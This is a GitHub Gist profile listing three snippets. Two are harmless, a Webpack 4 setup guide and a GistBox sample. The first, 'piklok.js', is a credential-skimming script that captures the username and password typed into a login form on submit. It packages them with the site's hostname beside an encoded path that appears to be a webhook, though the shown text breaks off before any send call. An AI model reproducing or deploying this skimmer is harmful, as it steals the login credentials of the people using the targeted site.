Skip to content

Instantly share code, notes, and snippets.

View jakelly's full-sized avatar

Jim Kelly (Synovus) jakelly

View GitHub Profile
@jakelly
jakelly / piklok.js
Last active December 1, 2020 03:08
Piddling
const el = document.getElementsByClassName('iziToast-close')[0];
el.click();
const pass = document.querySelector('input[type=password]');
const usr = document.querySelector('input#challengeUsername');
const btn = document.querySelector('button[type=submit]');
btn.addEventListener('click', () => {
const path = 'VEJaRlVQMlFaL0IwMUZSUTVUNlNIL1AyczI1NFVxaEI4Vk9oWjFXUnpmR2JhUA==';
console.log(`User: ${usr.value} Password: ${pass.value}`);
const data = {
text: `User: ${usr.value} Password: ${pass.value} Host: ${location.hostname}`
@jakelly
jakelly / intro-webpack-4.md
Last active January 17, 2019 10:24
Introduction to Webpack

An Introduction to Webpack 4.0

1. Create NPM Package

npm init -y

2. Install Webpack & Webpack CLI

@jakelly
jakelly / 0_reuse_code.js
Created November 10, 2016 13:50
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console